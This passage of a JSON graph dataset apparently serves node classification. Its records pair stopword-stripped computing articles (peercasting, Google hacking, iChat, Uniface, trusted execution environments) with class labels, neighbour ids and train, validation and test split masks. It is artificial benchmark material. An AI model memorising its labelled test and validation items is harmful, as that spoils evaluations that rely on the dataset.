    "text": "Peercasting:peercasting peercasting method multicasting streams usually audio and/or video internet via peer-to-peer technology used commercial independent amateur multicasts unlike traditional ip multicast peercasting facilitate on-demand content delivery peercasting usually works peers automatically relay stream peers p2p overlay network helps peers find relay specified stream connect method suffers poor quality service times relays disconnect peers need switch different relay referred churn another solution used minute swarming wherein live stream broken minute length files swarmed via p2p software bittorrent coral dijjer however suffers excessive overhead formation new swarm every minute new technique stripe live stream multiple substreams akin raid striping forward error correction timing information applied substreams original stream reformed using least one substreams fountain codes efficient way make combine substreams turn streams relayed using first method another solution permit clients connect new relay resume streaming left old relay relays would retain back buffer permit clients resume streaming anywhere within range said buffer would essentially extension icecast protocol",
    "neighbors": [
      8833,
      4229,
      4490,
      11274,
      10126,
      3350,
      10522,
      11674,
      2076,
      10270,
      945,
      7488,
      8640,
      11073,
      708,
      6351,
      6991,
      7761,
      3676,
      5085,
      3428,
      3813,
      1908,
      9332,
      119,
      4219
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7922,
    "label": 3,
    "text": "Deep_Dungeon:deep dungeon dungeon crawler presented first person perspective similar wizardry players navigate nondescript maze-like corridors bid find princess game released exclusively japan april 15 2006 deep dungeon unofficially translated english madō senki set town dorl one day monsters raided town stealing treasures princess etna soul despite attempts brave warriors retrieve soul none successful dungeon player given command list player choose attack enemy vicinity view allocated items escape battle examine area items talk people nearby character effectiveness battle largely determined numerical values attacking power ap defensive power ac health hp values determined character experience level level raises character accumulated experience ex reaches certain point also called deep dungeon ii yūshi monshō second installment deep dungeon series according square enix first 3d dungeon crawler rpg famicom console game villain ruu returned player need explore eight floor tower consisting four ground floors four underground floors find defeat battles much faster paced sequel whereas first game could get slow high miss rate player enemies creating prolonged battle scenes game improved also much higher encounter rate player likely attacked within seconds stand still new feature game player significantly higher level enemies current floor attacked randomly walking hallways although still attacked step predetermined spaces map player gains experience level given attribute points allocate character stats wish unlike console rpgs era stat upgrades usually predetermined randomized beyond player control third installment deep dungeon series first released famicom first deep dungeon title offer player world explore spanning multiple dungeons multiple towns also allows player create party three companions addition hero character choice ranger magician priest character though player dismiss character game started able replace character meet another pre-created playable character one dungeons however game still end soon protagonist swordsman character defeated game retains player-adjustable level-up stats first game well feature removes randomized encounters player significantly higher experience level needed current location one exclusive rather annoying feature game engine sometimes player character fumble remove equipped weapon wasting character turn player wishes re-arm weapon cost player another turn game series award player money gold defeating enemies games force player re-enter maps collect respawning chests money items resale want gold farm fourth final installment deep dungeon series unfortunately game removed custom character feature previous game game player meet two additional playable characters predetermined class game also reverts standard practice randomizing characters stat growth gaining experience level new engine player eventually learn summon two monsters function temporary additional party member single battle also removed feature stops random battles player significantly powerful enemies n't bad seems maps game also much smaller whereas previous games used multi-floor dungeons 32x32 tiles dungeons game either single floor multiple floors fit within single 32x32 map game player accept requests non-player characters optional tasks reward player bonus items experience money finished",
    "neighbors": [
      9006,
      606
    ],
    "mask": "Train"
  },
  {
    "node_id": 7923,
    "label": 1,
    "text": "SHERPA/RoMEO:sherpa/romeo sherpa/romeo service run sherpa show copyright open access self-archiving policies academic journals database uses colour-coding scheme classify publishers according self-archiving policy shows authors whether journal allows preprint postprint archiving copyright transfer agreements currently hold records 22,000 journals",
    "neighbors": [
      1857,
      10759
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7924,
    "label": 9,
    "text": "XLispStat:xlispstat xlispstat statistical scientific package based xlisp language xlispstat startup many free statistical software like arc nonlinear curve fitting problems vista based package includes variety statistical functions methods including routines nonlinear curve fit many add-on packages developed extend xlispstat including contingency tables regression analysis xlispstat seen usage many fields including astronomy gis speech acoustics econometrics epidemiology xlispstat historically influential field statistical visualization author luke tierney wrote 1990 book xlispstat dates late 1980s/early 1990s probably saw greatest popularity early-to-mid 1990s greatly declining usage since 1990s widespread use statistical education since mostly replaced r. paper explaining ucla department statistics abandoned 1998 reasons likely hold true many former users source code xlispstat available permissive license similar terms bsd",
    "neighbors": [
      5129,
      7945,
      3980,
      2317,
      6797,
      7950,
      2457,
      7580,
      7326,
      7983,
      6962,
      6718,
      5830,
      5703,
      4808,
      5833,
      5450,
      9166,
      2000,
      9944,
      2652,
      10848,
      4840,
      9320,
      363,
      5612
    ],
    "mask": "None"
  },
  {
    "node_id": 7925,
    "label": 1,
    "text": "Alacra:alacra alacra inc. privately owned american company provides information workflow tools financial institutions corporations professional services firms company founded data downlink corporation 1996 steven goldstein michael angle renamed alacra inc. june 2001 headquartered new york office london alacra received praise going outside traditional media outlets creating data feed produced monitoring group financial commentators includes bloggers",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 7926,
    "label": 4,
    "text": "Google_hacking:google hacking google hacking also named google dorking computer hacking technique uses google search google applications find security holes configuration computer code websites use google hacking involves using advanced operators google search engine locate specific strings text within search results popular examples finding specific versions vulnerable web applications search query codice_1 would locate web pages particular text contained within normal default installations applications include running version every page serve example powered xoops 2.2.3 final one even retrieve username password list microsoft frontpage servers inputting given microscript google search field devices connected internet found search string codice_2 find public web cameras another useful search following codice_3 followed search keyword give list files servers example codice_4 give mp3 files available various servers many similar advanced operators used exploit insecure websites link search operator google used turned 2017 concept google hacking dates back 2002 johnny long began collect google search queries uncovered vulnerable systems and/or sensitive information disclosures labeling googledorks list google dorks grew large dictionary queries eventually organized original google hacking database ghdb 2004 since heyday concepts explored google hacking extended search engines bing shodan automated attack tools use custom search dictionaries find vulnerable systems sensitive information disclosures public systems indexed search engines",
    "neighbors": [
      4995,
      5636,
      5892,
      7816,
      5262,
      8719,
      5524,
      7700,
      10645,
      8858,
      1435,
      10525,
      2978,
      4901,
      1959,
      3499,
      10284,
      1203,
      5431,
      7359,
      196,
      3269,
      3782,
      11590,
      4683,
      11343,
      3664,
      3795,
      1240,
      4956,
      8413,
      6367,
      2658,
      1251,
      6632,
      5483,
      236,
      9712,
      113,
      9970,
      8821,
      3836
    ],
    "mask": "Test"
  },
  {
    "node_id": 7927,
    "label": 4,
    "text": "The_Art_of_Intrusion:art intrusion art intrusion real stories behind exploits hackers intruders deceivers book kevin mitnick collection stories social engineering performed hackers story ends summarizing insight attack well measures defend book published mitnick first book art deception explores themes introduced first book",
    "neighbors": [
      4986,
      4435,
      4956,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 7928,
    "label": 2,
    "text": "IChat:ichat ichat previously ichat av discontinued instant messaging software application developed apple inc. use mac os x operating system supported instant text messaging xmpp/jingle oscar aim protocol audio video calling screen-sharing capabilities also allowed local network discussion users discovered bonjour protocols os x 10.8 mountain lion later releases ichat replaced messages ichat first released august 2002 part mac os x 10.2 featured integration address book mail applications first officially supported aim client native mac os x first-party aim application time still running classic emulation one episode first season hbo dramedy series entourage eric murphy ichat conversation ari gold marking first time application used television series ichat incorporated apple aqua interface used speech bubbles pictures personify online chatting experience ichat green available yellow idle red away icons could displayed next name connected user buddy list color-blind users could altered show different shapes circle available triangle idle squares away illustrate status shape rather color june 2003 apple announced ichat av second major version ichat added video audio conferencing capabilities based industry-standard session initiation protocol sip final version software shipped mac os x 10.3 became available separately day mac os x 10.2 february 2004 aol introduced aol instant messenger aim version 5.5 windows users enabled video audio chats aim protocol compatible apple ichat av day apple released public beta ichat av 2.1 allow mac os x users video conferencing aim 5.5 users june 2004 steve jobs announced next version ichat av would included mac os x 10.4. ichat av 3 provided additional support allow four people single video conference ten people audio conference additionally new version ichat used h.264/avc codec offered superior quality video compared older h.263 codec used previous versions release supported xmpp protocol could directly used connect google talk indirectly used connect users services including facebook chat yahoo messenger however support limited support several common xmpp features account creation service discovery full multi-user chat support ichat 3 included bonjour protocol previously called rendezvous allowed ichat automatically find users ichat bonjour messaging enabled local network october 2005 ichat received support encrypted communications paid subscribers .mac icloud service features part ichat 3.1 released part mac os x v10.4.3 update version also added support xmpp multi-user chat march 2007 apple released mac os x v10.4.9 update allowed usb video device class uvc cameras used ichat rather firewire cameras allowed wider range cameras used ichat av ichat 4 introduced part mac os x 10.5 received new features including ichat theater inspired chatfx product plum amazing backdrops screen sharing ichat theater allowed users share file supported quick look including photos keynote presentations movies video chat session backdrops allowed users insert movies photos backdrop video chats screen sharing allowed two users mac os x leopard control desktop work collaboratively minor features new release included multiple logins animated icons use photo booth effects live video chat tabbed chats ichat 5.0 released mac os x 10.6 reduced bandwidth required 640×480 video chats upgraded ichat theater resolution ichat 6.0 released mac os x 10.7 added support yahoo messenger account allowed ichat users text voice video chats using yahoo mail accounts also supported third-party plugins eventually allowing protocols compatible software ichat 6 last ichat version os x mountain lion replaced messages final release ichat 6.0.1 published february 1 2012 part os x mountain lion preview apple announced february 16 2012 os x messaging client would messages would support imessage protocol making compatible ios client messages also incorporates facetime support apple made messages immediately available downloadable beta version use mac os x 10.7. ichat aim support fully endorsed aol used official implementation aim oscar protocol using xmpp transport ichat could serve client aol instant messenger yahoo messenger mobileme icq xmpp ichat could also integrate google talk contacts xmpp pane",
    "neighbors": [
      10242,
      10755,
      9732,
      9734,
      4615,
      1036,
      1549,
      5647,
      1042,
      3610,
      10271,
      3105,
      6186,
      6700,
      4657,
      1074,
      8754,
      8758,
      576,
      6208,
      9802,
      5713,
      3670,
      1623,
      4184,
      2141,
      4702,
      3681,
      2149,
      3691,
      8303,
      6771,
      2676,
      7292,
      9343,
      5251,
      3719,
      10888,
      4746,
      11402,
      11408,
      8852,
      1686,
      7318,
      5784,
      3228,
      2207,
      1699,
      11430,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      1218,
      6849,
      6855,
      2760,
      713,
      1738,
      9418,
      3790,
      7378,
      3284,
      3286,
      9430,
      3289,
      4318,
      3812,
      231,
      2282,
      9451,
      4844,
      2288,
      8441,
      7422,
      11521,
      2819,
      1796,
      5382,
      10512,
      4888,
      11037,
      9511,
      811,
      3371,
      7983,
      9519,
      10036,
      9529,
      2363,
      2365,
      2366,
      4933,
      6982,
      9035,
      2892,
      6993,
      1878,
      9572,
      4457,
      3948,
      3959,
      3460,
      6023,
      4490,
      9100,
      9109,
      1439,
      1960,
      1962,
      1467,
      6093,
      7118,
      3035,
      4571,
      7133,
      4068,
      5093,
      6628,
      487,
      488,
      10221,
      5619,
      6647,
      11257,
      7163,
      10748,
      6654
    ],
    "mask": "Train"
  },
  {
    "node_id": 7929,
    "label": 4,
    "text": "Cyber_Terror_Response_Center:cyber terror response center cyber terror response center abbr ctrc also 2007 known netan net+an meaning safety korean language cybercrime section korean national police agency south korea center established 2000 computer crime investigation squad established 1997 headquartered knpa main building july 2008 center 900 employees majority police officers specializing cybercrime investigations center investigates cybercrimes incidents cyber terrorism provides digital forensics services korean police 2012 center website stated year 80,000 incidents cybercrimes reported south korea cites 2006 breakdown fraud 41 intrusion malware 23 online defamation 10 illegal web content 8 copyright violations 3 crimes 15 examples center actions include campaign reduce online slander cyber bullying 2008 launched aftermath suicide actress choi jin-sil raid korean google offices investigate privacy issues concerning google street view service 2010 cracking online discussions bomb making 2011 busting illegal online gambling operation 2012 center hosts international conference annual symposium cyber terror international symposium cybercrime response inaugurated together center 2000 center numerous international connections interpol hotlines memorandums understandings number foreign cybercrime investigations agencies",
    "neighbors": [
      4945,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 7930,
    "label": 9,
    "text": "Uniface_(programming_language):uniface programming language uniface development deployment platform enterprise applications run large range runtime environments including mobile mainframe web service-oriented architecture soa windows java ee .net uniface model-driven rapid application development rad environment used create mission-critical applications uniface applications database- platform-independent uniface provides integration framework enables uniface applications integrate major dbms products oracle microsoft sql server mysql ibm db2 addition uniface also supports file systems rms hp openvms sequential files operating system text files wide range technologies mainframe-based products cics ims web services smtp pop email ldap directories .net activex component object model com c ++ programs java uniface operates microsoft windows windows mobile various flavors unix linux vms ibm iseries z/os uniface used complex systems maintain critical enterprise data supporting mission-critical business processes point-of sale web-based online shopping financial transactions salary administration inventory control currently used thousands companies 30 countries effective installed base millions end-users uniface applications range client/server web data entry workflow well portals accessed locally via intranets internet originally developed netherlands inside automation later uniface b.v. product company acquired detroit-based compuware corp 1994 2014 acquired marlin equity partners independent company uniface b.v. global headquarters amsterdam uniface development environment—an integrated collection tools modeling implementing compiling debugging distributing applications uniface applications including use common runtime infrastructure consisting addition uniface anywhere formerly uniface jti java thin client interface deliver client/server uniface applications computer connected internet thin client solution uniface procedural scripting language called uniface proc used code application behavior uniface automates input/output operations kernel default code much fundamental behavior need coded uniface applications component-based infrastructure-independent software programs create use data stored one databases file-systems composite applications include non-uniface components created using development tools deployed distributed client/server web environments mobile applications web services mainframe environments uniface variety component types intended use different layers multi-tier application architecture components presentation tier responsible user interface include components business logic tier handle business rules task-specific behavior user interface data access tier contains physical database structures captured uniface application model uniface ensures physical data access encapsulating sql dbms connectors network middleware access encapsulated middleware drivers uniface router runtime engine executes application components displays presentation components using appropriate user interface connector either gui character-based sends receives data via dbms connector uniface applications developed uniface development environment originally possible develop apple dec platforms windows supported platform development uniface applications development model-driven component-based data structure business rules default behavior application captured application model model definitions reused inherited components override inherited definitions provide component-specific behavior characteristics templates improve productivity enforce consistency defining models application model defines entities tables fields keys indexes relationships together referential integrity entity field model properties set triggers business rules added model declaratively setting properties procedurally adding proc code uniface procedural language triggers triggers containers code triggers represent user system events example occurrence gets focus read leave field others cover matters validation act place holders methods associated particular object use model-level triggers enables uniface collect properties behavior within business objects separating logical physical data structures makes possible define default behavior reuse throughout application speeding development facilitating 3-tier application architecture entity table first defined application model exported physical database form create table scripts objects described application model reused components developers embed objects model component drawing layout canvas presentation components inserting tree view component structure also add component-level objects application model control fields menus component variables properties triggers defined application model inherited copied component definitions changed component level provide specific functionality breaks link application model component although possible restore link model model code properties changed model level components holding object need recompiled collect new definitions provides benefits maintenance ensures rules associated object available wherever used uniface maintains database metadata purposes reuse—application models component definitions component layouts procedural code repository proprietary intended access via uniface development environment ensure repository integrity however repository structure documented making possible though recommended interface directly example reporting using centralized repository application development shared teams software developers uniface integrate version control system vcs supports microsoft common source code control interface specification vcs functionality available within uniface depends vcs used software vendors interpreted implemented ms cscc api differently uniface applications deployed platforms mainframe mobile without changing code components objects startup shells menus toolbars panels glyphs global included proc entries compiled runtime objects packaged zip files deployed onto platform runtime objects executed using virtual machine platform-specific interpreter java later followed uniface respect components compiled one machine executed another providing uniface virtual machine present uniface router uniface server make uniface scalable balanceable make possible run processes asynchronously uniface accesses many databases file systems supports means database connectors drivers dbms connectors map convert uniface data types suitable format particular storage medium runtime possible pass parameters invoke disable database-specific extensions provided database connector licensed possible convert different data sources uniface also provides api database connector interface used create proprietary connectors sql-based database licensing managed compuware distributed license manager dlm server based system distributing licenses clients request precluding need held locally originally called unis product created netherlands 1984 inside automation company headed bodo douqué frits kress technical director 1986 product company changed name uniface early logo product included red capital reflected red capital inside automation logo uniface developed principles american national standards institute ansi 3-schema architecture first proposed 1975 standard approach building database management systems consisting 3 schema metamodels uniface developed dec vax machine using native vax file-management system rms vestige still seen today ’ product continued use “ gold ” key change modes dec vt terminals actually gold yellow key keyboard today “ gold ” simply mapped numeric keyboard key function key early versions product bundled sybase rdbms name fastbuild although limited accessing database uniface continuously evolved handle new technologies application architectures critical success applications built uniface migrated updated modernized without losing original development investment uniface version 3 1986 uniface 3 first public release featured support multiple databases rms oracle c_isam ingres rdb virtual machine interpretation structure editor uniface text command editor uniface version 4 1988 uniface 4 improved text editor form editor improved printing display support introduced support ms-dos added case tool interface uniface version 5 1990 uniface 5 enabled client/server deployment introduction remote database access polyserver introduced graphical user interface via universal presentation interface upi database support extended total 13 databases file systems available dos vms os/2 stratus vos unix japanese character support also introduced uniface six 1994 uniface six completed move fully graphical development environments included graphical form painter application model editor improved deployment dynamic object libraries added support microsoft object linking embedding ole included support apple macintosh added permissions control integrated version control added personal series reporting tools although later removed 3rd party decided enhance product wider platform support uniface seven 1997 uniface seven focused component integration uniface external components introduction uniface request broker urb architecture urb supports bi-directional synchronous asynchronous communication components well remote data access added partitioned application servers messaging uniface seven also delivered first uniface web development deployment tools web application server uniface request dispatcher enhancements included new component types services server pages reports signature editor assembly workbench subsystems operations non-modal forms component instances improved editors navigation enhanced editor plug-in new debugger integrated online help component templates web application server improved validation uniface name server graphical partitioning manager uniface seven also saw introduction several tools uniface 8 2001 uniface 8 brought major changes area process integration uniface router uniface server provided scalable balanced deployment web request dispatcher wrd replaced urd improving performance support web services soap xml introduced connectivity interoperability improved method implementing 3-tier application architecture introduced connectors soap com corba mqseries added window file management improved new deployment utility introduced improving application distribution component subtypes 3-tier architecture added handles added component instances automatic garbage collection added uniface 9 2006 uniface 9 release focused gui usability improvements thin deployment integration support windows mobile added configuration deployment simplified using zipped archives support unicode improved already impressive multilingual capability improvements web development xml handling brought uniface line industry standards dynamic field movement form components removed old barriers flexibility features included improved color handling dynamic menus xml api diagram editor application model cross-referencing functionality support refactoring deployment enhanced web services functionality uniface 9.4 2010 despite point release uniface 9.4 introduced enough major new functionality considered major release major focus rich internet application ria functionality making possible develop web 2.0 applications rich functionality client/server applications using tools methodologies used develop classic client/server applications language locale support substantially improved support html email security encryption uniface 9.5 2011 release uniface 9.5 improved product ’ integration world wide web introduction javascript api together improvements means client-side processing bring benefits areas performance integration functionality user-friendliness session management capability extended offer improved security processing web services fully supports complex datatypes soap restful services also improvements customers business-critical client/server applications particularly area grid widget uniface 9.6 2012 uniface 9.6 provided significant overhaul uniface client server gui capabilities functionality included html5 control leveraging javascript apis originally delivered web enhanced tab control updates image handling buttons plus improvements form container control enables 'forms within forms enabling development dynamic user experiences addition gui enhancements uniface 9.6 also delivered enhancements uniface web web services capabilities including ability dynamically change scope web transactions web pagination hitlist processing improved wsdl xml capabilities uniface 9.7 2015 uniface 9.7 delivered significant enhancements development web applications including extensions facilitate development deployment mobile applications based hybrid application enhancing multi-channel development/deployment capability uniface significantly extended uniface 9.7.02 release may 2016 providing integration build service provider enable hybrid applications packaged distribution via google play apple store addition mobile web enhancements uniface 9.7 delivered integration client server enhancements ms windows 10 uniface development environment ude modernized new look feel providing new look front screen refreshed visual user experience approach uniface took modernize ude shared developer conferences community website uniface.info help advise promote client server modernization existing customer base uniface 9.7 provides two new database drivers enabling connectivity postgresql sap hana uniface 10 2015 uniface 10 delivered rewritten development environment based core concepts integrated development environments ide initial release positioned preview early adopter release showed significant change proprietary development style highly productive implementation industry standard development enabling development web applications may 2015 first edition uniface 10 released early adopters test develop web applications full enterprise edition uniface 10 released september 2016 delivering mobile client server development migration path enable existing customer base move applications uniface 10",
    "neighbors": [
      4107,
      6797,
      11024,
      5397,
      11030,
      10020,
      10026,
      5677,
      10413,
      7983,
      11187,
      9909,
      823,
      4042,
      11604,
      8539,
      10340,
      3560,
      7022,
      5492,
      2168,
      4604,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 7931,
    "label": 9,
    "text": "Roberto_Ierusalimschy:roberto ierusalimschy roberto ierusalimschy born may 21 1960 brazilian computer scientist known creating lua programming language holds ph.d computer science pontifical catholic university rio de janeiro appointment associate professor informatics post-doc university waterloo 1992 visiting professor stanford university 2012 leading architect author programming lua .. also responsible creating lpeg lua library implementing parsing expression grammars",
    "neighbors": [
      4777,
      8057,
      8262,
      5783
    ],
    "mask": "None"
  },
  {
    "node_id": 7932,
    "label": 4,
    "text": "Microsoft_Tape_Format:microsoft tape format microsoft tape format mtf tape format used several backup tools microsoft windows platform notable examples include microsoft ntbackup program backup exec backup utilities included microsoft sql server several open source utilities written read mtf non-windows platforms",
    "neighbors": [
      1801,
      6797,
      11030
    ],
    "mask": "None"
  },
  {
    "node_id": 7933,
    "label": 2,
    "text": "Sbrk:sbrk brk sbrk basic memory management system calls used unix unix-like operating systems control amount memory allocated data segment process functions typically called higher-level memory management library function malloc original unix system brk sbrk ways applications could acquire additional data space later versions allowed also done using mmap call brk sbrk calls dynamically change amount space allocated data segment calling process change made resetting program break process determines maximum space allocated program break address first location beyond current end data region amount available space increases break value increases available space initialized value zero break value automatically rounded size appropriate memory management architecture brk subroutine sets program break value value end_data_segment parameter changes amount available space accordingly sbrk subroutine adds program break value number bytes contained increment parameter changes amount available space accordingly increment parameter negative number case amount available space decreased set increment parameter zero fetch current value program break upon successful completion brk subroutine returns value 0 sbrk subroutine returns prior value program break available space increased prior value also points start new area either subroutine unsuccessful value returned errno global variable set indicate error current mac os x implementation sbrk emulation maximum allocation 4 megabytes limit reached −1 returned errno set enomem error enomem set allocated space remains unchanged one following true",
    "neighbors": [
      1152,
      8545,
      2627,
      4423,
      4968,
      10407,
      5492,
      5397,
      7933
    ],
    "mask": "Train"
  },
  {
    "node_id": 7934,
    "label": 4,
    "text": "Buck-security:buck-security buck-security security scanner linux first released june 2009 originally designed system administrators maintaining debian ubuntu servers program runs security checks like looking worldwriteable files directories listening services unwanted installed packages version 0.5 checksum feature included creates encrypted list checksums important system files buck-security claims concentrate important checks therefore usable security scanners like lynis tiger april 2010 buck-security featured sourceforge blog july 2013 added yocto project 20",
    "neighbors": [
      5612,
      7983,
      8399,
      5492,
      4309,
      823
    ],
    "mask": "Train"
  },
  {
    "node_id": 7935,
    "label": 7,
    "text": "Open_Grid_Forum:open grid forum open grid forum ogf community users developers vendors standardization grid computing formed 2006 merger global grid forum enterprise grid alliance ogf models process internet engineering task force ietf produces documents many acronyms ogsa ogsi jsdl ogf two principal functions plus administrative function standards organization grid computing building communities within overall grid community including extending within academia industry function areas divided groups three types working groups generally tightly defined role usually producing standard research groups looser role bringing together people discuss developments within field generate use cases spawn working groups community groups restricted community functions three meetings organized per year divided approximately evenly averaging number years north america europe east asia many working groups organize face-to-face meetings interim concept forum bring together developers practitioners users distributed computing known grid computing time discussed birds feather session november 1998 sc98 supercomputing conference based response idea bof ian foster bill johnston convened first grid forum meeting nasa ames research center june 1999 drawing roughly 100 people mostly us group organizers nominated charlie catlett argonne national laboratory university chicago serve initial chair confirmed via plenary vote held 2nd grid forum meeting chicago october 1999 advice assistance internet engineering task force ietf ogf established process based ietf ogf managed steering group 1998 groups similar grid forum began organize europe called egrid japan discussions among leaders groups resulted combining form global grid forum met first time amsterdam march 2001 ggf-1 amsterdam followed five grid forum meetings catlett served ggf chair two 3-year terms succeeded mark linesch hewlett packard september 2004 enterprise grid alliance ega formed 2004 focused large data center businesses emc corporation netapp oracle corporation ggf-18 23rd gathering forum counting first five gf meetings september 2006 ggf became open grid forum ogf based merger ega september 2007 craig lee aerospace corporation became chair technologies specified ogf include addition technical standards ogf published community-developed informational experimental documents first version drmaa api implemented sun grid engine also university wisconsin-madison program condor cycle scavenger separate globus alliance maintains implementation standards globus toolkit release unicore based ogsa architecture jsdl",
    "neighbors": [
      10625,
      8702,
      11658,
      4107,
      10641,
      531,
      9876,
      2710,
      158,
      5414,
      10413,
      3502,
      1076,
      6651,
      8892,
      7615,
      5956,
      7364,
      198,
      1607,
      4052,
      9301,
      11353,
      222,
      479,
      8030,
      9441,
      105,
      7018,
      4091,
      7294
    ],
    "mask": "Test"
  },
  {
    "node_id": 7936,
    "label": 4,
    "text": "Trusted_execution_environment:trusted execution environment trusted execution environment tee secure area main processor guarantees code data loaded inside protected respect confidentiality integrity tee isolated execution environment provides security features isolated execution integrity applications executing tee along confidentiality assets general terms tee offers execution space provides higher level security rich operating system os functionality 'secure element se open mobile terminal platform omtp first defined tee advanced trusted environment omtp tr1 standard defining set hardware software components providing facilities necessary support applications meet requirements one two defined security levels first security level profile 1 targeted software attacks profile 2 targeted software hardware attacks commercial tee solutions based arm trustzone technology conformed tr1 standard trusted foundations developed trusted logic later launched work omtp standards ended mid 2010 group transitioned wholesale applications community wac omtp standards including defining tee hosted gsma tee isolated environment runs parallel operating system providing security rich environment intended secure user-facing os offers higher level performance functionality secure element se using hybrid approach utilizes hardware software protect data therefore offers level security sufficient many applications trusted applications running tee access full power device main processor peripherals memory hardware isolation protects user installed apps running main operating system software cryptographic isolation inside tee protect trusted applications contained within service providers mobile network operators mno operating system developers application developers device manufacturers platform providers silicon vendors main stakeholders contributing standardization efforts around tee prevent simulation hardware user-controlled software so-called hardware root trust used set private keys so-called endorsement keys provisioned secrets embedded directly chip manufacturing one-time programmable memory efuses usually used despite large area chip take changed whose public counterparts reside manufacturer database together non-secret hash public key belonging trusted party usually chip vendor used sign trusted firmware alongside circuits cryptographic operations controlling access hardware designed way prevents software signed trusted party key accessing privileged features public key vendor provided runtime hashed hash compared one embedded chip hash matches public key used verify digital signature trusted vendor-controlled firmware chain bootloaders android devices 'architectural enclaves sgx trusted firmware used implement remote attestation untrusted component application required attested loads trusted one memory trusted application protected modification untrusted components hardware nonce requested untrusted party verifier server used part cryptographic authentication protocol proving integrity trusted application proof passed verifier verifies valid proof computed simulated hardware i.e qemu order construct access keys baked hardware required trusted firmware access keys and/or keys derived obtained using platform owner meant access data recorded foundry verifying party must interact service set vendor scheme implemented improperly chip vendor track applications used chip selectively deny service returning message indicating authentication passed simulate hardware way enables pass remote authentication attacker would extract keys hardware costly equipment reverse-engineering skills required focused ion beam scanning electron microscope microprobing decapsulation even impossible hardware designed way reverse-engineering destroys keys cases keys unique piece hardware key extracted one chip useless another ones though deprivation ownership inherent property tees possible design system way allows user obtained ownership device first control system practice systems consumer electronics intentionally designed allow chip manufacturers control access attestation algorithms allows manufacturers grant access tees software developers usually commercial business agreement manufacturer enable use cases tivoization drm number use cases tee though possible use cases exploit deprivation ownership tee usually used exactly note much tee literature covers topic definition premium content protection preferred nomenclature many copyright holders premium content protection specific use case digital rights management drm controversial among communities free software foundation .it widely used copyrights holders restrict ways end users consume content 4k high definition films tee suitable environment protecting digitally encoded information example hd films audio connected devices smart phones tablets hd televisions suitability comes ability tee deprive owner device reading stored secrets fact often protected hardware path tee display and/or subsystems devices tee used protect content device content protected transmission streaming use encryption tee protects content decrypted device ensuring decrypted content exposed environment approved app developer platform vendor mobile commerce applications mobile wallets peer-to-peer payments contactless payments using mobile device point sale pos terminal often well-defined security requirements tees used often conjunction near field communication nfc ses trusted backend systems provide security required enable financial transactions take place scenarios interaction end user required may require user expose sensitive information pin password biometric identifier mobile os means authenticating user tee optionally offers trusted user interface used construct user authentication mobile device tee well-suited supporting biometric id methods facial recognition fingerprint sensor voice authorization may easier use harder steal pins passwords authentication process generally split three main stages tee good area within mobile device house matching engine associated processing required authenticate user environment designed protect data establish buffer non-secure apps located mobile os additional security may help satisfy security needs service providers addition keeping costs low handset developers tee used governments enterprises cloud service providers enable secure handling confidential information mobile devices server infrastructure tee offers level protection software attacks generated mobile os assists control access rights achieves housing sensitive ‘ trusted ’ applications need isolated protected mobile os malicious malware may present utilizing functionality security levels offered tee governments enterprises assured employees using devices secure trusted manner likewise server-based tees help defend internal external attacks backend infrastructure rise software assets reuses modular programming productive process design software architecture decoupling functionalities small independent modules module contains everything necessary execute desired functionality tee allows organize complete system featuring high level reliability security preventing module vulnerabilities others order modules communicate share data tee provide means securely payloads sent/received modules using mechanisms objects serialization conjunction proxies see component-based software engineering following hardware technologies used support tee implementations",
    "neighbors": [
      11588,
      3337,
      7212,
      9964,
      1776,
      2416,
      2224,
      2259,
      1945,
      7354,
      3323,
      5918,
      9311
    ],
    "mask": "None"
  },
  {
    "node_id": 7937,
    "label": 7,
    "text": "OnApp:onapp onapp london uk-based software company software enables service providers build operate sell iaas public cloud private cloud content delivery network services onapp also operates onapp federation wholesale cloud infrastructure marketplace enables service providers buy sell cloud infrastructure managed onapp software enables enterprises adopt hybrid cloud model combining on-premises cloud infrastructure public cloud resources onapp founded 2010 onapp partnerships include 8 august 2011 onapp announced acquisition aflexi cdn management software company 16 september 2014 onapp announced acquisition solusvm virtual server management software company 7 june 2018 solusvm acquired onapp plesk",
    "neighbors": [
      10368,
      4194,
      6153,
      2795,
      1400
    ],
    "mask": "None"
  },
  {
    "node_id": 7938,
    "label": 2,
    "text": "Comparison_of_netbook-oriented_Linux_distributions:comparison netbook-oriented linux distributions netbooks small laptops screen sizes approximately 7 12 inches low power consumption use either ssd solid state disk hdd hard disk drive storage 2 gigabytes ram often less lack optical disk drive usually usb ethernet wifi often bluetooth connectivity name emphasizes use portable internet appliances special linux distributions called netbook distributions machines distributions purport optimized use small low-resolution displays tend include broad mix voip web-focused tools including proprietary applications rarely seen installed default mainstream desktop distributions instance nokia maemo asus customized xandros ship skype adobe flash installed ubuntu netbook edition offers option oems public numbers measuring install-base operating systems available google trends data handful indicate relative popularity",
    "neighbors": [
      2560,
      5644,
      5139,
      9237,
      10780,
      4637,
      3618,
      9257,
      1584,
      5681,
      9266,
      10817,
      8772,
      10820,
      2134,
      5721,
      3162,
      2658,
      6244,
      6763,
      10860,
      9851,
      11391,
      7812,
      8326,
      10382,
      657,
      2195,
      9882,
      6301,
      1694,
      10933,
      9407,
      4803,
      6352,
      3289,
      3802,
      10464,
      1761,
      4841,
      7913,
      5356,
      7920,
      6393,
      4360,
      1813,
      5410,
      1833,
      815,
      5430,
      823,
      6968,
      3395,
      3911,
      10063,
      4437,
      11095,
      3422,
      863,
      2914,
      10091,
      6508,
      7020,
      10606,
      1394,
      1396,
      6012,
      1406,
      3458,
      7555,
      11654,
      4493,
      10127,
      11155,
      10646,
      1431,
      9637,
      935,
      4011,
      9646,
      1456,
      11184,
      9660,
      10687,
      4040,
      457,
      5067,
      8147,
      9696,
      11232,
      1506,
      8676,
      2021,
      9190,
      5096,
      10732,
      499,
      1524,
      2036,
      5620,
      4603
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7939,
    "label": 3,
